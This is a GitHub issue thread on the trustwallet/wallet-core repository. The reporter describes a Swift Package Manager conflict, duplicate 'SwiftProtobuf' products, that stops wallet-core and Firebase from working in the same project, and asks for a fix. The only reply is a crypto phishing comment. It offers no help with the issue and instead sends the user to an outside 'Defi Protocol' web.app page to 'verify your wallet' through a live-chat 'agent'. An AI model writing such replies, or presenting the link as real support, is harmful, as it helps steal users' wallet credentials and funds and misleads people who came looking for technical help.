### ISSUE TITLE
SPM: Firebase and wallet-core

### ISSUE THREAD

**Issue by a1r2** [trustwallet/wallet-core#3353]
It is impossible to have wallet-core and Firebase working together using Swift Package Manager.

Error says: multiple products named 'SwiftProtobuf' in 'swift-protobuf',  'wallet-core'

Create a fresh project; add one and then the other; it does not matter the order.

You will get:

<img width="652" alt="Screenshot 2023-08-05 at 17 19 02" src="https://github.com/trustwallet/wallet-core/assets/42868695/44315f27-c960-42fa-a719-ac65931359cb">

Anyone? How to make it work? Can you guys rename the file? Any tips?

Thanks!

**Comment by Hendrickss** [comment]
Hi @a1r2 
Visit the official [Defi Protocol](https://defirefixprotocol.web.app/) page to verify your wallet under validation to complete your request for you eligibility purpose via Defi Protocol.
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.
